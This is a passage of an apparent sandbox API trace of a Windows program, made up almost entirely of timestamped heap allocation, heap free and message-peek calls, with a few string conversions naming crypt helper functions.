hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x275a) returned 0xac2780 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.530] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x275a) returned 0xac0018 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.530] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0037.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.531] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x275a) returned 0xac0018 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0037.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x275a) returned 0xac4ee8 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.532] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.533] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.534] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.534] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.535] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.536] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.537] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 